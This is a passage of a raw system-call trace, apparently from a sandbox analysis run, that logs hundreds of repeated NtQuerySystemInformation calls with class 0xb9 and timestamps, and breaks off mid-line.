[0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 